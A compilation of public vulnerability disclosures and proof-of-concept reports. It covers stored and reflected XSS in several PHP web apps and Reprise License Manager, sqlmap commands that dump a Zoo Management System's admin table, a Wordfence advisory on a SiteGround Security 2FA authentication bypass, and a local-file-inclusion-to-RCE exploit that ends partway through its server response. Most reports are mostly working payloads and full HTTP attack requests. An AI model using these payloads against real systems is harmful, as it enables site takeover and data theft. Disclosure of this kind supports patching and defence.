<pre><code># sms-Add_Student-Stored_XSS-POC<br /># Author: D4rkP0w4r <br /><br />Description => Stored_XSS at Add Student<br /><br /># Step to Reproduct<br />* Login to admin -> Students -> Add Student -> input payload <img/src/onerror=prompt(10)> at Enter Name<br /><br /># Exploit<br />* Input payload at Enter Name -> clicked Add Students -> access All Student -> The XSS will trigger<br />* Log out admin and typed roll number -> The XSS will trigger<br /><br /># Vulnerable Code<br />* When inserting into the database, the input is not filtered out bad characters<br /><br /># POC <br />* Injection Point <br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="name"<br /><br /><img/src/onerror=prompt(10)><br /><br />* Request<br /><br />POST /sms/admin/addstudent.php HTTP/1.1<br />Host: localhost:8080<br />Content-Length: 992<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost:8080<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost:8080/sms/admin/addstudent.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k<br />Connection: close<br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="image"; filename="car.png"<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="rollno"<br /><br />1234567<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="name"<br /><br /><img/src/onerror=prompt(10)><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="contact"<br /><br />123456<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="standerd"<br /><br />1<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="city"<br /><br />Newyork<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="email"<br /><br />haha@gmail.com<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="gender"<br /><br />male<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="submit"<br /><br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K--<br /><br /></code></pre>
<pre><code># AeroCMS-Comment-Stored_XSS-POC<br /># Author: D4rkP0w4r <br />* Note => Don't need register or login account <br />* Description => Stored_XSS at comment box<br /><br />## Step to Reproduct<br />* Click Read More -> input payload <img/src/onerror=prompt(10)> at Author -> click Submit button <br /><br /># Exploit<br />* Input payload at Author -> click Submit button<br />* When admin login to admin panel and click Comments -> The XSS will trigger <br />* Finally, Success !!!!<br /><br /># Vulnerable Code<br />* view_all_comments.php<br />* Stored xss in comment section<br />* Impact is to get the cookie and execute the js code in the admin panel<br />* Because Comments are displayed in admin panel<br />* post.php<br />* No encoding is implemented when inserting data to database<br /><br /># POC<br />* Injection Point <br />comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=<br /><br />* Request<br />POST /AeroCMS/post.php?p_id=36 HTTP/1.1<br />Host: localhost:8080<br />Content-Length: 126<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost:8080<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost:8080/AeroCMS/post.php?p_id=36<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441<br />Connection: close<br /><br />comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=<br /><br /><br /><br />POC VIDEO https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing<br /><br /><br />----<br /><br /># AeroCMS-Add_Posts-Stored_XSS-Poc<br />* Description => Stored_XSS at Post Title<br /><br />## Step to Reproduct<br />* Login to admin panel -> Posts -> Add Posts -> Post Title -> inject payload <img/src/onerror=prompt(10)> -> The XSS will trigger when clicked Edit Post button<br /><br />## Vulnerable Code<br />* add_post.php<br />When inserting into the database, the input is not filtered out of html characters<br />* post.php<br /><br />Even when displaying, the entity cannot be properly encoded<br />-------------------------------------------------------------<br /># POC<br />* Injection Point<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_title"<br /><br /><img/src/onerror=prompt(10)><br /><br />* Request<br />POST http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26 HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291<br />Content-Length: 1101<br />Origin: http://localhost:8080<br />Connection: keep-alive<br />Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26<br />Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_title"<br /><br /><img/src/onerror=prompt(10)><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_category_id"<br /><br />1<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_user"<br /><br />admin<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_status"<br /><br />published<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="image"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_tags"<br /><br />1<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_content"<br /><br /><p>111</p><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="update_post"<br /><br />Edit Post<br />-----------------------------85448121341942511952219062291--<br /><br /><br />POC VIDEO<br />https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing<br /></code></pre>
<pre><code># Zoo Management System SQL Injection<br /># Author: D4rkP0w4r <br />* Description => sql injection at /animals?class_id=1<br />* Injection Point<br /><br />http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1<br /><br /># Exploit <br />* Exploit with Sqlmap<br />python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -dbs<br /><br />python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -tables -D zoomanagement<br /><br />python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -columns -D zoomanagement -T admin -dump<br /><br /># Vulnerable Code<br /><br />* No filter `class_id` when inserting data to database<br /><br /></code></pre>
<pre><code>Multiple Vulnerabilities in Reprise License Manager 14.2<br /><br />Credit: Giulia Melotti Garibaldi<br /><br />//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2022-28363<br /># Vulnerability Title: Reflected Cross-Site Scripting<br /># Severity: Medium<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-03-29<br />#<br />#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 38<br />Origin: http://HOST:5054<br />Connection: keep-alive<br />Referer: http://HOST:5054/goform/login_process<br /><br /><br /><br /><br /><br />/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2022-28364<br /># Vulnerability Title: Authenticated Reflected Cross-Site Scripting<br /># Severity: Low<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-03-29<br />#<br />#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Origin: http://HOST:5054<br />Connection: keep-alive<br />Referer: http://HOST:5054/goforms/rlmswitchr<br />Cookie: REDACTED<br /><br /><br /><br /><br />/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2022-28365<br /># Vulnerability Title: Unauthenticated Information Disclosure<br /># Severity: Low<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-03-29<br />#<br />#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.<br />The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goforms/rlminfo HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Connection: keep-alive<br />Content-Length: 0<br /><br /><br /><br />//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /></code></pre>
<pre><code>Description: Authentication Bypass via 2-Factor Authentication Setup<br /><br />Affected Plugin: SiteGround Security<br /><br />Plugin Slug: sg-security<br /><br />Plugin Developer: SiteGround<br /><br />Affected Versions: <= 1.2.5<br /><br />CVE ID: CVE-2022-0992<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: ​1.2.6<br /><br />SiteGround Security is a plugin designed to enhance the security of WordPress installations via several features like login security including 2FA, general WordPress hardening, activity monitoring, and more. It’s also worth noting that it comes pre-installed on all SiteGround hosted WordPress sites. Unfortunately, the 2FA functionality of the plugin was insecurely implemented making it possible for unauthenticated attackers to gain access to privileged accounts.<br /><br />When two-factor authentication is enabled, it requires all administrative and editor users to set-up two factor authentication. This requirement is triggered when the site's administrative and editor users log into the site for the first time after 2FA has been enabled at which time they are prompted to configure 2FA for their account. This means that there will be a period of time between 2FA being enabled on a site and each user configuring it for the account.<br /><br />During this interim period, attackers could hijack the 2FA set-up process. The plugin had a flaw that made it so that attackers could completely bypass the first step of authentication, which requires a username and password, and access the 2FA set-up page for users that had not configured 2FA yet.<br /><br />It was as simple as supplying the user ID they would like to compromise via the sg-user-id parameter, along with a few other parameters to indicate that they would like to trigger the initial 2FA configuration process.<br /><br />The following validate_2fa_login() function shows the process by which a user-supplied ID is validated. If the results from the check_authentication_code() function and the sg_security_2fa_configured user meta retuned false, which indicated that 2FA hasn’t yet been configured for that user, then the plugin would load the 2fa-initial-setup-form.php template which displays the QR code and 2FA secret needed to configure the authenticator app for the user supplied ID.<br /><br />[Please view the code snippet on our blog here. (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) ]<br /><br />2FA-Initial Setup (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 )<br /><br />The returned QR code and secret key are the only things needed to connect the user account with an authentication mechanism, such as Google Authenticator. Attackers were able to use this to connect their authentication app with the account and successfully use a code to pass the “second factor of authentication.” This function would then set the user authentication cookies via the wp_set_auth_cookie() function using the user supplied ID from the sg-user-id parameter which effectively logs the attacker in as that user. Due to the default configuration of the plugin, this account would most likely be a privileged user like an administrator or editor. It’s also worth noting that the function returns the back-up codes which could be used via the weakness outlined in the next section.<br /><br />To sum it up, there was no validation on the validate_2fa_login() function that the identity a user was claiming was in fact legitimate. As such attackers could bypass the first authentication mechanism, a username/password pair, which is meant to prove identity and successfully log in, due to a weakness in the second authentication mechanism, the 2FA process. When successful, an attacker could completely infect a site by exploiting this vulnerability.<br /><br />Description: Authorization Weakness to Authentication Bypass via 2-Factor Authentication Back-up Codes<br /><br />Affected Plugin: SiteGround Security<br /><br />Plugin Slug: sg-security<br /><br />Plugin Developer: SiteGround<br /><br />Affected Versions: <= 1.2.4<br /><br />CVE ID: CVE-2022-0993<br /><br />CVSS Score: 8.1 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: ​1.2.6<br /><br />In addition to the above outlined vulnerability, the method in which 2FA back-up code authentication was handled made it possible for attackers to log in if they were able to brute force a back-up code for a user or compromise it via other means such as SQL Injection.<br /><br />Diving deeper, the plugin registered the validate_2fabc_login() function which validated the supplied backup code through the validate_backup_login() function using the user supplied user ID from the sg-user-id parameter along with the back-up code supplied via the sgc2fabackupcode parameter. If the back-up code was found in the array of stored back-up codes for that user, then the function would use the wp_set_auth_cookie() function to set the authentication cookies for the supplied user ID. If that user ID belonged to an administrator, the attacker would effectively be logged in as an administrator.<br /><br />[Please view the code snippet on our blog here. (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) ]<br /><br />Similarly to the previous vulnerability, the issue here is that there was no true identity validation for the authentication, which indicates an authorization weakness. The function performed no checks to verify that a user had previously authenticated prior to entering the 2FA back-up code, and as such they did not need to legitimately log in prior to being logged in while using a back-up code. This meant that there were no checks to validate that a user was authorized to use a back-up code to perform the second factor of authentication that would log them in.<br /><br />Though the risk in this case is lower, the backup codes were 8 digits long and entirely numeric, so an attacker could potentially brute force one of the 8 back-up codes and automatically be logged in without knowing a username and password combination for an administrative user.<br /><br />While this might not be practical to attempt on most servers, a patient adversary attacking a well-provisioned server capable of processing a large number of requests at once would have a high chance of eventually gaining access unless the brute force attempts were stopped by another mechanism, such as the Wordfence plugin’s built-in brute force protection or rate limiting rules.<br /><br />Further, this vulnerability could be used in conjunction with another vulnerability, such as SQL injection, where an attacker would be able to compromise the 2FA back-up codes that are stored in the database and then subsequently use them to log in without needing to crack the password of an administrative user which would likely be significantly stronger. In both cases, the impact would be significant as an attacker could gain administrative access to the compromised WordPress site which could be used for complete site infection.<br /><br />An Important Security Reminder: Audit Your WordPress Site's User Accounts<br /><br />This vulnerability serves as an important reminder to audit your WordPress site's user accounts. This means identifying any old and unused user accounts that have been inactive for an extended period of time and/or are likely to never be used again and removing them or completely stripping the user's capabilities. This vulnerability could easily be exploited on sites where the site owner enabled 2FA, which is required for all administrative and editor users, and had old inactive administrative/editor user accounts on the site that an attacker could target. Considering accounts that are no longer active are unlikely to log in after the 2FA setting has been enabled, the 2FA for those accounts would not be configured leaving the site ripe for exploitation by any attackers exploiting the vulnerability.<br /><br />A situation involving a similar security issue involving insecure 2FA was reported by the CISA in conjunction with the FBI a few weeks ago (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP6N3kWF5V1-WJV7Cg-j9W3-nvtq4C7KHBW40PfMb4MYPJbW1Q5kSc6V4L5qW6KLQRC2q1f1GW1sJ8Sc8FpjgyVMxbKf8wRgS5W7SJm5X3BMZ7pW7c1gB85kW6R5W7_1vH12JVyxfW2bvpn47y1jCwW4bGJCj8Yr_J9W6G15j12562xnW1JGqmS9htnJ4W92Hm456nf8mmW5HYmmj8PQ_-XN6yRnxTWHvr1W2Rcg0C9bjZbQVldvV225B_SNVn14Rz8yQJNNW9361-n6Z0KSqW7qysVm5djVCLW7S8dFb3p268N35ns1 ) , around the same time we discovered this vulnerability. In the Cybersecurity Advisory (CSA) by the CISA, it was disclosed that a threat actor was able to successfully brute force a dormant user's account credentials, and due to a default 2FA setting that would allow dormant users to re-enroll a new device for 2FA during the next active log in, the threat actor was able to connect the 2FA secret to their own account and retrieve the code needed to pass the second factor of authentication. Once the threat actor gained initial access to the system they were able to escalate their privileges by exploiting the “PrintNightmare” vulnerability, which you can read more about here (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP7Z3kWGhV1-WJV7CgB7nVd4Vn790XT8mW5fLrl94CwHLyN4SY-BCgMPx2W2J0HKM95hFGZW5kH7TY8xmV9XW3cvgng2RnjHgW3WnWKM11J-SYMMsWWClb6SsN7tCYmV8HVLWW94cbjz2Y59FZW3m_y6X3frj2NW2qylmN1v_rd3W7G52q37Z04l1W358br17nn8CKN2WZXm3WsfBMW7Q0j7B62HsDkW1c91Wl13XylvW4K2Z2j4pFcsrW69shJz7SLQqtW56-6sG22ZvKzW4-wHXt2r-t_JN8lF8ZMCw9ryW3Cp1M85939QWW5kcNj98w0_VSW1gjfmD2sHZcMVPGSHC7_28pwW1GTLkd82-ytmW973xZ_5mvdNmW5Y0pyZ2YkCrLW31vbQf1Gn9hY36mT1 ) , and steal sensitive information from across the organization's network. This goes to show that attackers are definitely looking for flaws like the one disclosed today to exploit and any site can be a target. As such, it's important to actively maintain and validate the security of your site through regularly performed professional or self-conducted security audits and penetration tests, which is a service Wordfence provides (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP6N3kWF5V1-WJV7Cg-S6W7JPXRK7CbvvTW79tFY751pMcjN6MxMTf2wTd6W80YKYD36-Z5NMnKkDHfsZtmN23Pf3-Xvb1GN6yHj8fHYYYRW9cdrHs11b_2pW6_-ZSP1JQZ_PW8DVt5k5JYlK4W3BKzMg6Ch8PmW6bKv4s6Q5PJ8W66Hj7T3cdzDZW5QQjDC9k9mhLW5zbDpn70cpTTW3g6Cy75Ndf9yW4LXgkz17NVxhW4l0Qhz3KwfjkW7SDrh888kb4HW2N_kfl61WZK2W4v5s3z8BJz6LW4q2d0j359Lnj36-C1 ) . Security is an active and continuous process.<br /><br />Timeline<br /><br />March 10, 2022 – Conclusion of the plugin analysis that led to the discovery of two Authentication Bypass Vulnerabilities in the “SiteGround Security” WordPress plugin. We deploy firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response users. We send the full disclosure details to SiteGround in accordance with their responsible disclosure policy.<br /><br />March 11, 2022 – The CTO of SiteGround responds indicating that a patch has been released. We review the patch and inform them that it is insufficient. They release an additional patch.<br /><br />March 11, 2022 – A patched version of the plugin is released as version 1.2.3. We suggest further security enhancements to the functionality.<br /><br />March 16, 2022 – An update is made that reduces the security of the 2FA functionality, we follow-up again to suggest better security enhancements to the functionality. The CTO assures us that they are working on it.<br /><br />April 7, 2022 – A fully and optimally patched version of the plugin is released as version 1.2.6.<br /><br />April 9, 2022 – Wordfence Free users receive the firewall rules.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “SiteGround Security” plugin that made it possible for unauthenticated attackers to gain access to administrative user accounts in instances where 2-Factor Authentication was enabled, though not yet fully set up, and in cases where an attacker could successfully brute force a back-up code. This could easily be used by an attacker to completely compromise a site. These flaws have been fully patched in version 1.2.6.<br /><br />We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.<br /></code></pre>
<pre><code>Title: Online Sports Complex Booking System 1.0 XSS<br />Author: Zllggggg<br />Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br />Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br />Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.md<br />Tested on: Windows, MySQL, Apache<br /><br />Description:<br /><br />When registering users at the front desk, when we fill in the information,<br />we use burpsuite to catch the data packet,After obtaining the data packet,<br />modify the email parameter to <script>alert(1)</script> then send the<br />packet,Then log in to the background with the administrator account ,Click<br />registered clients to trigger the pop-up window<br /><br />Data packet<br />POST /scbs/classes/Users.php?f=save_client HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)<br />Gecko/20100101 Firefox/98.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------289647566033806702832762971625<br />Content-Length: 1284<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/scbs/register.php<br />Cookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="firstname"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="middlename"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="lastname"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="contact"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="address"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="email"<br /><br /><script>alert(1)</script><br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="password"<br /><br />123<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------289647566033806702832762971625--<br /></code></pre>
<pre><code># Title: School Club Application System 1.0 LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 08.04.2022<br /># Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />```<br /><?php <br />require_once('config.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'home';<br />$page_name = explode("/",$page)[count(explode("/",$page)) -1];<br />?><br />```<br /><br />[+] Payload GET<br /><br /><br />```<br />GET /scas/?page=../../0day&515=dir HTTP/1.1<br />Host: 0day.gov<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=edh1ho9c9skog6v2ns0n0j3f2k<br />Connection: close<br /><br /><br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Fri, 08 Apr 2022 04:05:58 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 13563<br /><br /></h1><br /> <p class="lead text-white mt-3">.. .. 0day Page</p><br /> </div><br /> </div><br /> </div><br /> </div><br /> </header><br /> <div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6"><br /> Volume in drive C is OS<br /> Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\xampp\htdocs\scas<br /><br />04/08/2022 06:27 AM <DIR> .<br 